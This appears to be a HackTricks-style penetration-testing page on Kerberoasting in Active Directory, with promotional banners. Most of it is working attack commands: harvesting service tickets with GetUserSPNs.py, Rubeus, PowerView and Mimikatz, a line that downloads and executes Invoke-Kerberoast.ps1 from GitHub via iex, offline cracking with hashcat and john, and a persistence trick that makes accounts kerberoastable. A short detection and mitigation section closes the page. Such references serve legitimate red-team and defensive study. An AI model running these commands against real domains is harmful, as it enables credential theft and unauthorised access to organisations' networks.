# Kerberoast {% hint style="danger" %} ![](<../../.gitbook/assets/image (9) (3).png>) \ Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ Get Access Today: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} {% endhint %}
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## Kerberoast The goal of **Kerberoasting** is to harvest **TGS tickets for services that run on behalf of user accounts** in the AD, not computer accounts. Thus, **part** of these TGS **tickets are** **encrypted** with **keys** derived from user passwords. As a consequence, their credentials could be **cracked offline**.\ You can know that a **user account** is being used as a **service** because the property **"ServicePrincipalName"** is **not null**. Therefore, to perform Kerberoasting, only a domain account that can request for TGSs is necessary, which is anyone since no special privileges are required. **You need valid credentials inside the domain.** {% code title="From linux" %} ```bash msf> use auxiliary/gather/get_user_spns GetUserSPNs.py -request -dc-ip / -outputfile hashes.kerberoast # Password will be prompted GetUserSPNs.py -request -dc-ip -hashes : / -outputfile hashes.kerberoast ``` {% endcode %} {% code title="From Windows, from memory to disk" %} ```bash Get-NetUser -SPN | select serviceprincipalname #PowerView, get user service accounts #Get TGS in memory Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ServicePrincipalName" #Example: MSSQLSvc/mgmt.domain.local klist #List kerberos tickets in memory Invoke-Mimikatz -Command '"kerberos::list /export"' #Export tickets to current folder ``` {% endcode %} {% code title="From Windows" %} ```bash # Powerview Request-SPNTicket -SPN "" #Using PowerView Ex: MSSQLSvc/mgmt.domain.local # Rubeus .\Rubeus.exe kerberoast /outfile:hashes.kerberoast .\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.kerberoast #Specific user # Invoke-Kerberoast iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1") Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast ``` {% endcode %} {% hint style="warning" %} When a TGS is requested, Windows event `4769 - A Kerberos service ticket was requested` is generated. {% endhint %} {% hint style="danger" %} ![](<../../.gitbook/assets/image (9) (3).png>) \ Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ Get Access Today: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} {% endhint %} ### Cracking ``` john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt ./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi ``` ### Persistence If you have **enough permissions** over a user you can **make it kerberoastable**: ```bash Set-DomainObject -Identity -Set @{serviceprincipalname='just/whateverUn1Que'} -verbose ``` You can find useful **tools** for **kerberoast** attacks here: [https://github.com/nidem/kerberoast](https://github.com/nidem/kerberoast) If you find this **error** from Linux: **`Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)`** it because of your local time, you need to synchronise the host with the DC: `ntpdate ` ### Mitigation Kerberoast is very stealthy if exploitable * Security Event ID 4769 – A Kerberos ticket was requested * Since 4769 is very frequent, lets filter the results: * Service name should not be krbtgt * Service name does not end with $ (to filter out machine accounts used for services) * Account name should not be machine@domain (to filter out requests from machines) * Failure code is '0x0' (to filter out failures, 0x0 is success) * Most importantly, ticket encryption type is 0x17 * Mitigation: * Service Account Passwords should be hard to guess (greater than 25 characters) * Use Managed Service Accounts (Automatic change of password periodically and delegated SPN Management) ```bash Get-WinEvent -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{$_.Message.split("`n")[8] -ne 'krbtgt' -and $_.Message.split("`n")[8] -ne '*$' -and $_.Message.split("`n")[3] -notlike '*$@*' -and $_.Message.split("`n")[18] -like '*0x0*' -and $_.Message.split("`n")[17] -like "*0x17*"} | select ExpandProperty message ``` **More information about Kerberoasting in ired.team in** [**here** ](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting)**and** [**here**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled)**.**
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{% hint style="danger" %} ![](<../../.gitbook/assets/image (9) (3).png>) \ Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ Get Access Today: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} {% endhint %}